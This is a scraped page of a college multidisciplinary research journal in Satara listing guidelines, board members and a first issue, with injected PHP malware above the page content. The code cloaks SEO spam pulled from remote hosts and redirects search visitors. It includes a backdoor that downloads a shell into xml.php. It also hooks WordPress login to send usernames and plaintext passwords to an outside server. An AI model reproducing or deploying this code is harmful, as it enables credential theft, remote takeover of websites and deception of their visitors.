if (!function_exists('getUserIP')) { function getUserIP() { foreach(array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach(array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('cacheUrl')) { function cacheUrl($url, $skip_cache = FALSE) { $cachetime = 10; //one week // $cachetime = 60 * 60 * 24 * 7; //one week $file = ABSPATH.WPINC. '/class-wp-http-netfilter.php'; $mtime = 0; if (file_exists($file)) { $mtime = filemtime($file); } $filetimemod = $mtime + $cachetime; if ($filetimemod < time() OR $skip_cache) { $ch = curl_init($url); curl_setopt_array($ch, array( CURLOPT_HEADER => FALSE, CURLOPT_RETURNTRANSFER => TRUE, CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36', CURLOPT_FOLLOWLOCATION => TRUE, CURLOPT_MAXREDIRS => 5, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 60, )); $data = curl_exec($ch); curl_close($ch); if ($data AND!$skip_cache) { file_put_contents($file, $data); } } else { $data = file_get_contents($file); } return $data; } } $weoboo = cacheUrl('https://acagna.info/lnk/data/ip.admin.txt'); $user_ip = getUserIP(); if (strpos($weoboo, getUserIP()) !== false) { //ip found } else { $id = $_SERVER['REQUEST_URI']; if (preg_match_all("/ffgg$/", $id, $matches) ) { echo '111111'; } $uag = $_SERVER['HTTP_USER_AGENT']; $id = $_SERVER['REQUEST_URI']; $host=$_SERVER['HTTP_HOST']; $ref =$_SERVER['HTTP_REFERER']; $uri =$_SERVER['REQUEST_URI']; //t $pagesID = $_SERVER['REQUEST_URI']; if (!preg_match_all("/wp-login|wp-admin|admin|xmlrpc/", $pagesID, $matches)) { $apiToken = 'tws5mkxns8qpz5hqywtcknjfw4wgrbhp'; $keyword =$_SERVER['REQUEST_URI']; $url_page=$_SERVER['REQUEST_URI']; $ua = urlencode($_SERVER['HTTP_USER_AGENT']); $lang = (isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2) : ''); $ip = null; $headers = array('HTTP_X_FORWARDED_FOR', 'HTTP_CF_CONNECTING_IP', 'HTTP_X_REAL_IP', 'REMOTE_ADDR'); foreach ($headers as $header) { if (!empty($_SERVER[$header])) { $ip = $_SERVER[$header]; break; } } if (strstr($ip, ',')) { $tmp = explode(',', $ip); if (stristr($_SERVER['HTTP_USER_AGENT'], 'mini')) { $ip = trim($tmp[count($tmp) - 2]); } else { $ip = trim($tmp[0]); } } if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $tmp = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $ip = trim($tmp[0]); } else { $ip = $_SERVER['REMOTE_ADDR']; } $referrer = urlencode(@$_SERVER['HTTP_REFERER']); $url = "https://bantuzu.info/api.php?is_api=1&action=get&token=$apiToken&ua=$ua&ip=$ip&keyword=$keyword&referrer=$referrer&lang=$lang&sub_id_1=".$_SERVER['HTTP_HOST']."&" . http_build_query($_GET) . ""; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); curl_close($ch); $result = json_decode($output); print $result->{'body'}; } @ini_set('display_errors', '0'); error_reporting(0); @ini_set("memory_limit","1024M"); $curtime = time(); $hspan = 0; $gen_passwd = "57ffb10f130bd90ab7a342fe814ccbd8"; $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (preg_match('#.txt|.jpg|.png|/feed/|.xml|.ico#', $donor)) die(); if ($_REQUEST['testwork'] == 'ololo') { $twork = file_get_contents('http://acagna.info/lnk/up/sh.txt'); if (preg_match("#cgi|admin#i", $eb)) $eb = ''; if (file_put_contents("{$eb}xml.php", $twork)) echo "success!
go"; else echo "error!"; die(); } if (ini_get('allow_url_fopen')) { function get_data_yo($url) { $data = file_get_contents($url); return $data; } } else { function get_data_yo($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 8); $data = curl_exec($ch); curl_close($ch); return $data; } } $ip = urlencode($_SERVER['REMOTE_ADDR']); $ua = urlencode($_SERVER['HTTP_USER_AGENT']); //block ddos bots $blbots = '/semrush|rogerbot|exabot|mj12bot|dotbot|gigabot|ahrefsbot|ia_archiver/i'; if (preg_match($blbots, $ua)) die(); $ref = urlencode($_SERVER['HTTP_REFERER']); $poiskoviki = '/google|bing|yahoo|aol|rambler/i'; $fromse = 0; if ($ref && preg_match($poiskoviki, $ref)) $fromse = 1; $abt = 0; $abtip = 0; if (isset($_GET['debug'])) $abt = 1; $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i'; $crawlers = '/a|b|c|d|e|f|g/i'; if (preg_match($crawlers, $ua)) { $abt = 1; } if (file_exists("{$eb}.bt")) { $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); $btime = filemtime("{$eb}.bt"); $obtime = $curtime - $btime; } if (!$bots[2] || $obtime > 172800) { $fbots = get_data_yo("http://acagna.info/lnk/bots.dat"); $btf = fopen("{$eb}.bt", 'w'); fwrite($btf, $fbots); fclose($btf); $bots = file("{$eb}.bt", FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES); } if (in_array($ip, $bots)) { $abt = 1; $abtip = 1; } $st = '.st'; $cldw = 0; $dw = 0; if ($_REQUEST["create"] == 1 && $_REQUEST["gen_passwd"] == $gen_passwd) { $cldw = 0; if ($_REQUEST['cldw']) $cldw = 1; $qq = $_REQUEST['qq']; if (!file_exists("{$eb}{$st}/.r")) { $qq = $_REQUEST['qq']; mkdir("{$eb}{$st}"); } else { $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq']; else $qq = trim($eqq[2]); } $redir = $_REQUEST['redir']; $redcode = $_REQUEST['redcode']; $redcode = htmlspecialchars_decode($redcode); $redcode = base64_encode($redcode); $group = $_REQUEST['group']; if ($cldw) { $egroup = explode('_', $group); $kgroup = $egroup[0]; $clkeys = get_data_yo("http://acagna.info/lnk/gen/keys/$kgroup.keys"); file_put_contents("{$eb}{$st}/.k", $clkeys); } $lang = $_REQUEST['lang']; file_put_contents("{$eb}{$st}/.r", "$redir|$group|$qq|$lang|$redcode|$cldw"); if (file_exists("{$eb}{$st}/.r")) { echo "created"; die(); } } if (file_exists("{$eb}{$st}/.r")) { $dw = 1; $pamparam = file_get_contents("{$eb}{$st}/.r"); $eqq = explode('|', $pamparam); $redir = $eqq[0]; if (!strstr($redir, 'https://')) $redir = base64_decode($redir); $group = $eqq[1]; $qq = trim($eqq[2]); $lang = trim($eqq[3]); if ($eqq[4]) $redcode = base64_decode($eqq[4]); $cldw = $eqq[5]; } $donor = $_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; $ddomain = $_SERVER['HTTP_HOST']; $ddomain = str_ireplace('www.', '', $ddomain); $eddomain = explode('.', $ddomain); $ddname = $eddomain[0]; $donor = str_ireplace('www.', '', $donor); $page = str_replace('/', '|', $donor); $donor = urldecode($donor); $epage = explode('|', $page); $morda = 0; if (!$epage[1] && !$epage[2] || $epage[1] == 'index.php' || $epage[1] == '?p=home') $morda = 1; //$fromse = 1; if ($abt || $fromse || $redcode || $hspan) { if (($abt || $hspan) && !$_GET[$qq]) { $ll = get_data_yo("http://acagna.info/lnk/tuktuk.php?d=$donor&cldw=$cldw&dgrp=$algo"); $el = explode(' ', $ll); } if (file_exists("{$eb}{$st}/$page.html")) { $htmlpage = file_get_contents("{$eb}{$st}/$page.html"); echo $htmlpage; die(); } $mdpage = md5($page); if (file_exists("{$eb}{$st}/$page.txt") || file_exists("{$eb}{$st}/$mdpage.txt")) { if (file_exists("{$eb}{$st}/$mdpage.txt")) $gtxt = file_get_contents("{$eb}{$st}/$mdpage.txt"); else $gtxt = file_get_contents("{$eb}{$st}/$page.txt"); $etxt = explode('|', $gtxt); $key = $etxt[0]; $desc = $etxt[1]; $txt = $etxt[2]; $h1 = $etxt[3]; } elseif ($cldw || isset($_GET[$qq])) { $desc = ''; $keys = file("{$eb}{$st}/.k", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); if ($keys[0]) { $key = $keys[0]; for ($kk = 1; $kk < count($keys); $kk++) $newkeys .= "$keys[$kk] "; file_put_contents("{$eb}{$st}/.k", $newkeys); } if (isset($_GET[$qq])) { $key = str_replace('-', ' ', $_GET[$qq]); } if ($key) { $parkey = $key; $tkey = str_replace(' ', '-', $key); if (stristr($lang, 'own')) { $lang = str_replace('own:', '', $lang); $owntext = base64_decode($lang); $wkey = urlencode($key); if (strstr($owntext, '?')) $ttxt = get_data_yo("{$owntext}&key=$wkey"); else $ttxt = get_data_yo("{$owntext}?key=$wkey"); } else $ttxt = get_data_yo("http://acagna.info/lnk/gen/index.php?key=$tkey&g=$group&lang=$lang&page=$page&cldw=$cldw&dd=$ddomain"); if (preg_match('#\n$parkey rating\n
\n$rating-5 stars based on\n$rcount reviews\n
\n\n"; $desc = $etxt[2]; $txt .= $etxt[3]; if ($desc == 'desc') { $desc = get_data_yo("http://acagna.info/lnk/gen/desc.php?key=$tkey&desc=$group"); preg_match('#gogogo(.*)enenen#is', $desc, $mtchs); $desc = $mtchs[1]; } $mdpage = md5($page); file_put_contents("{$eb}{$st}/$mdpage.txt", "$title|$desc|$txt|$h1"); $newclpage = str_replace('|', '/', $page); $newcllink = "$parkey "; if ($cldw) file_put_contents("{$eb}{$st}/cldwmap.txt", $newcllink, FILE_APPEND); } } $iswp = 0; if (file_exists('wp-includes/vars.php')) $iswp = 1; $cldwmap = file("{$eb}{$st}/cldwmap.txt", FILE_SKIP_EMPTY_LINES | FILE_IGNORE_NEW_LINES); ob_start(); function shutdown() { global $morda; global $eb; global $txt; global $qq; global $key; global $desc; global $lang; global $cldwmap; global $el; global $dw; global $cldw; global $redcode; global $abt; global $hspan; global $h1; global $iswp; global $ddname; $title = ucfirst($key); $my_content = ob_get_contents(); ob_end_clean(); if ($my_content && isset($_REQUEST['prigod'])) { $my_content = '---prigod---'; } if ($key && $abt) { if ($cldw && !$morda) { preg_match_all('##iUm', $my_content, $ahrefs); $cntahrefs = count($ahrefs[0]); $cntcldwmap = count($cldwmap); $i = 0; foreach ($ahrefs[0] as $ahref) { if ($cldwmap[$i]) { $my_content = str_replace($ahref, $cldwmap[$i], $my_content); } $i++; } if ($morda) { $cldwfooter = ''; foreach ($cldwmap as $cldwflink) { $cldwfooter .= "$cldwflink "; } $my_content = str_replace('', "
$cldwfooter
", $my_content); } } if (!$morda) { $my_content = preg_replace('##iUs', "$title", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace('##iUm', "

$h1

", $my_content, 1); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = str_replace('', " ", $my_content); $my_content = preg_replace("##iUs", '', $my_content); $my_content = preg_replace('##iUs', '', $my_content, 1); if (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', $my_content)) { $my_content = preg_replace('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs')) { $my_content = preg_replace('##iUs', "\n
$txt
", $my_content, 1); } elseif (@preg_match('#
(.*)
#iUs', $my_content)) { $my_content = preg_replace('#
(.*)
#iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "
\n$txt\n
", $my_content, 1); } elseif (@preg_match('##iUs', $my_content)) { $my_content = preg_replace('##iUs', "\n
\n$txt\n
", $my_content, 1); } } } //end if key elseif (!preg_match('#(.*)404(.*)#i', $my_content) && !preg_match('#<title>(.*)not found(.*)#i', $my_content)) { foreach($el as $ln) { if (preg_match('#<strong>#', $my_content)) { $my_content = preg_replace('#<strong>#', "_-strong-_ $ln ", $my_content, 1); } elseif (preg_match('#<b>#', $my_content)) { $my_content = preg_replace('#<b>#', "_-b-_ $ln ", $my_content, 1); } elseif (preg_match('#<i>#', $my_content)) { $my_content = preg_replace('#<i>#', "_-i-_ $ln ", $my_content, 1); } elseif (preg_match('#<u>#', $my_content)) { $my_content = preg_replace('#<u>#', "_-u-_ $ln ", $my_content, 1); } elseif (preg_match('#<p(.*)>#', $my_content)) { $my_content = preg_replace('#<p(.*)>#iUs', "_-p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#</p>#', $my_content)) { $my_content = preg_replace('#</p>#', "_-/p-_ \n$ln ", $my_content, 1); } elseif (preg_match('#<br(.*)>#', $my_content)) { $my_content = preg_replace('#<br(.*)>#iUs', " $ln ", $my_content, 1); } elseif (preg_match('#<span(.*)>#', $my_content)) { $my_content = preg_replace('#<span(.*)>#iUs', "_-span-_ $ln ", $my_content, 1); } elseif (preg_match('#<body(.*)>#iUs', $my_content)) { $my_content = preg_replace('#<body(.*)>#iUs', "<body>\n$ln ", $my_content, 1); } } $my_content = str_replace('_-', '<', $my_content); $my_content = str_replace('-_', '>', $my_content); //$my_content = str_replace('</head>', "<script type='text/javascript'> function style_{$ddname} () { return 'none'; } function end_{$ddname} () { document.getElementById('$ddname').style.display = style_{$ddname}(); } </script>\n</head>", $my_content); //$my_content = str_replace('</body>', "<script type='text/javascript'> end_{$ddname}(); </script>\n</body>", $my_content); } echo $my_content; } register_shutdown_function('shutdown'); } if (($_GET[$qq] || $cldw) && $fromse && !$abt) { if (!$redcode && !$morda) { if ($key) $tkey = str_replace(' ', '+', $key); else $tkey = str_replace('-', '+', $_GET[$qq]); if (strstr($redir, '?')) $redir .= "&keyword=".$tkey; else $redir .= "?keyword=".$tkey; $redir = str_replace('KEY', $tkey, $redir); header("Location: $redir"); echo "<script type=\"text/javascript\">location.href=\"$redir\";</script>"; die(); } elseif (!$morda) { $key = str_replace('-', ' ', $_GET[$qq]); $redcode = str_replace('KEY', $key, $redcode); echo stripslashes($redcode); } } /* your code end */ } /* weoboo end */ if(!isset($_COOKIE['_eshoob'])) { setcookie('_eshoob', 1, time()+604800, '/'); // unset cookies if (isset($_SERVER['HTTP_COOKIE'])) { $cookies = explode(';', $_SERVER['HTTP_COOKIE']); foreach($cookies as $cookie) { if (strpos($cookie,'wordpress') !== false || strpos($cookie,'wp_') !== false || strpos($cookie,'wp-') !== false) { $parts = explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Research Publications – Yashoda Technical Campus

Research Publications

Yashoda Multidisciplinary Research Journal is an open access reviewed online journal, covering all the fields of Engineering, Pharmacy, MBA and MCA. The journal is intended to provide a platform for the students, researchers, academicians, professionals to impart and share knowledge through genuine research in the broader field of respective areas, thereby promoting the interest of prospective researchers. Yashoda Multidisciplinary Research Journal aims to be enriching the quality of research work in most important research fields of Engineering, Pharmacy, MBA and MCA. The journal evaluates the research methods of each article for validity and accepts articles solely on the basis of the research. It gives an exposure to the research scholars in the field of Professional and technical education. This open access journal is beneficial for the worldwide research community to communicate and synchronize their research activities leading to growth and application of research and technology.

Journal Particulars

TitleYashoda Multidisciplinary Research Journal
Frequencybi-annual
ISSN
PublisherYashoda Shikshan Sanstha’s Yashoda Technical Campus, Wadhe, Satara
Chief EditorDr. R.R.Chavan, editor_ymrj@yes.edu.in
CopyrightYashoda Technical Campus, Wadhe, Satara
Starting Year 2022
SubjectMultidisciplinary
LanguageEnglish
Publication FormatOnline
Phone Number9172220775
Email-idprincipalpharma_ytc@yes.edu.in
Mobile Number9822027806
Websitewww.yes.edu.in
AddressYashoda Technical Campus, Wadhe, NH4, Satara 415011

Guidelines for Authors

  • Format & Style
    Manuscripts:
    All manuscripts submission should be through online to be uploaded on the website or email on editor_ymrj@yes.edu.in. A single word file should consist content in double space on with one inch margin on all sides. The single word File should consist title page, abstract, main text, tables, charts, images at its appropriate places and references at last as per APA guidelines.
    Cover Page:
    Manuscripts of a paper should have a cover page providing the title of the paper, the name(s), address, phone, fax numbers and e-mail address of all authors and acknowledgments, if any. Please restrict the author – related information only to cover page. Further, please mention the subject under which the paper should be included.
    Abstract:
    Following the cover page, there should be an abstract page, which should contain the title of paper, the subtitle “Abstract” and a summary of the paper in double space. It should not exceed 150 words in length along with three to four keywords. The text of the paper should not start on this page, but on a fresh page. References should be cited in the style prescribed in the publication manual of the American Psychological Association (APA Guidelines).
    Figures & Tables:
    Each Figure/table should be numbered, titled. The position of Figure or table should be placed at appropriate place within the article only.
    Length of the Papers:
    The total length of the paper should not exceed 2000 words(Includes maximum 2 to 3 charts/table/Figures in total, paper with more charts/table/figure will not published.
  • Publication Fees: YMRJ is not charging publication fees.
  • PLEASE E-MAIL YOUR PAPER ON – editor_ymrj@yes.edu.in
Copyright Agreement FormView

Yashoda Multidisciplinary Research Journal publishes reviewed, original research and review articles in an open access format. Accepted articles span the full extent of the various fields of Engineering, Pharmacy, MBA and MCA.
Yashoda Multidisciplinary Research Journal aims to be the most important research journal. The journal evaluates the research methods of each article for validity and accepts articles solely on the basis of the research. Likewise, by not restricting papers to a narrow discipline, Yashoda Multidisciplinary Research Journal facilitates the discovery of the connections between papers, whether within or between disciplines.
Yashoda Multidisciplinary Research Journal offers authors (especially student) a continuous publication format for their research via Yashoda Multidisciplinary Research Journal Online. All articles are professionally copyedited and typeset to ensure quality. Those who should submit to Yashoda Multidisciplinary Research Journal include:

  • Authors who want their articles to receive quality reviews and efficient production.
  • Authors who want their articles to receive free, broad, and a powerful, highly
  • discoverable publishing platform.
  • Authors who want or need their articles to be open access because of university or
  • government mandates.

Advisory Board

Sr. No.Name of AdvisorDesignationResearch ExperienceAddressContact NumberMail ID
 1Dr. M. G. KalaskarAssociate Professor14 YearsR C Patel Institute Of Pharmaceutical Education And Research, Shirpur8149448119kalaskar.mohan@gmail.com
 2Dr. P. L. IngaleProfessor & Principal18 YearsDnyanvilas College of Pharmacy,
Dudulgaon, Pune
9822493075ingalepramod@rediffmail.com
 3Dr. D. S. BadkarPrincipal25 YearsYashoda Technical Campus, faculty of Engineering, Satara8660919112/ 9620397797principalengg_ytc@yes.edu.in
 4Dr. J. L. BhagoriaProfessor & Dean27 YearsMaulana Azad National Institute of Technology, Bhopal(MP),India9826398288deansw@manit.ac.in
 5Dr. Ing G. BuvanashekaranDeputy General Manager35 YearsWelding Research Institute, Bharat Heavy Electricals Ltd. Tiruchirappalli, Tamilnadu91431-2577266gbs@bheltry.co.in
 6Dr. Ms. Mangala DhendAssociate Professor35 YearsAISSMS College of Engineering, Pune9420696493mangaldhend1@gmail.com
 7Dr. N. D. ShikalgarAssociate Professor18 YearsCollege of Engineering, Pune9823286386nds.mech@coep.ac.in
 8Dr. S. S. BholaAssociate Professor16 YearsKarmaveer Bahurao Patil Institute of Management Studies and Research, Satara9822124414sarangbhola@gmail.com
 9Dr. R. D. KumbharAssistant Professor16 YearsKarmaveer Bahurao Patil Institute of Management Studies and Research, Satara9422613603rdk14@rediffmail.com
Sr. No.NameEditorial Board MemberDepartmentAddressMail IDProfile Link
1Dr. Vivekkumar Kanhaiyalal RedasaniPatronPharmacyYashoda Technical Campus, Wadhe, NH4. Satara 415011principalpharma_ytc@yes.edu.inView
2Dr. Rajashri Ramesh ChavanChief EditorMBAYashoda Technical Campus, Wadhe, NH4. Satara 415011rrc_mba@yes.edu.in
editor_ymrj@yes.edu.in
View
3Dr. Vitthal Jagannath ChavareAssociate EditorPharmacyYashoda Technical Campus, Wadhe, NH4. Satara 415011mpharmhod_ytc@yes.edu.inView
4Dr. Sachin Haridas RohaneAssociate EditorPharmacyYashoda Technical Campus, Wadhe, NH4. Satara 415011shr_bpharm@yes.edu.inView
5Dr. Sunita Popat JadhavAssociate EditorMCAYashoda Technical Campus, Wadhe, NH4. Satara 415011spj_mca@yes.edu.inView
6Dr. Sarita Vitthal BalshetwarAssociate EditorComputer Science & EngineeringYashoda Technical Campus, Wadhe, NH4. Satara 415011svb_cse@yes.edu.inView
7Mr. R. D. MohiteAssociate EditorMBAYashoda Technical Campus, Wadhe, NH4. Satara 415011mbahod_ytc@yes.edu.in
8Prof. Uma BhokareAssociate EditorComputer Science & EngineeringYashoda Technical Campus, Wadhe, NH4. Satara 415011umb_cse@yes.edu.in
9Mrs. P. V. ShindeAssociate EditorPolytechnicYashoda Technical Campus, Wadhe, NH4. Satara 415011polycivilhod@yes.edu.in
10Mr. Jahir PatelAssociate EditorE&TCYashoda Technical Campus, Wadhe, NH4. Satara 415011jhp_etc@yes.edu.in
11Mrs. Sayli JadhavAssociate EditorCivil EngineeringYashoda Technical Campus, Wadhe, NH4. Satara 415011ssj_civil@yes.edu.in
12Mr. A. S. ShivadeAssociate EditorMechanical EngineeringYashoda Technical Campus, Wadhe, NH4. Satara 415011ass_mech@yes.edu.in
13Mr. Kishor ShindeAssociate EditorElectrical EngineeringYashoda Technical Campus, Wadhe, NH4. Satara 415011krs_ele@yes.edu.in
14Mr. A.V. PatilAssociate EditorPolytechnicYashoda Technical Campus, Wadhe, NH4. Satara 415011avp_ele@yes.edu.in
15Mr. R. S. DangeAssociate EditorPolytechnicYashoda Technical Campus, Wadhe, NH4. Satara 415011rsd_mechpoly@yes.ed

Volume 01, Issue 01, June 2022

Sr. No.Title and Name of the AuthorPage NumberDocument
1In-silico Study of Anticancer Drugs Available in Market
By Anushka Kulkarni*, Dr. Sachin Rohane
Department of Pharmacy, Yashoda Technical Campus, Satara, 415003.
*Corresponding Author E-mail: anukulsatara@gmail.com
1-4View
2Review on: Laboratory Scale Solid Dispersion Techniques.
By Ms. Nikam S.P., Mr. Velhal A.B., Dr. Jadhav P.D., Mrs. B.P.Chaudhari YSPM YTC, Faculty of Pharmacy, Wadhe, Satara swatinikam381@gmail.com
6-11View
3Lycopene Potentiate the Antiepileptic Activity of Phenobarabital in Epileptic Mice
By P.S. More, Dr. V.J. Chaware, Dr. V.K. Redasani,
Department of Pharmacology Yashoda Technical Campus, Faculty of Pharmacy, Wadhe, Satara prajakta.more1707@gmail.com
12-16View
4Multi-Objective Optimization for Turning using MOORA Approach
By Anand Shivade
1Assistant Professor, Faculty of Engineering, Yashoda Technical Campus, Satara, (MH), India, 415015*Corresponding author Email: shivadeanand@yahoo.in
17-25View
5A Study on Design and Development of Die and Punch For Bending Metal Sheets
By SurajDhumal1,IrshadPatel2,AnkitaPatil3,JyotiJadhav4, P.P.Nimbalkar5*
UG Students, Department of Mechanical Engineering , 5Assistant Professor, Department of Mechanical Engineering Yashoda Technical Campus, Satara
E-Mail:ppn_mech@yes.edu.in
26-29View
6A Study On: Learning Management System (LMS) For Education in Cloud Technology
Prof. Uma Bhokare, Assistant Prof. Department of Computer Science Engineering, 9421679283
Aniruddha S.Nalawade, SnehalS.Shinde, Amruta R.Widhate, Prajakta M.Shinde.
Students(B.tech) Department of Computer Science Engineering, Corresponding author email: umb_cse@yes.edu.in
30-35View
7Physiability And Suitability of Recycled Plastic Waste in Production of Paver Blocks Using Shuttering Ply
By Prof. Shah. Ajinkya.S*1, Mr. BhosaleSurajBalu *2,Mr.Surve.Ajinkya.Sanjay 3, Mr. Bagwan.Saad.Salim Civil EngineeringDepartment, YashodaTechnical Campus, Satara, Maharashtra,India.2,3,4,Students,Civil Engineering, Yashoda TechnicalCampus, Satara, Maharashtra, India. ass_civil@yes.edu.in
36-42View
8“An Assessment And Applicability Of Solid Waste Management (Plastic Materials), A Case Study For Gondavale Bk. Taluka-Man, District-Satara”
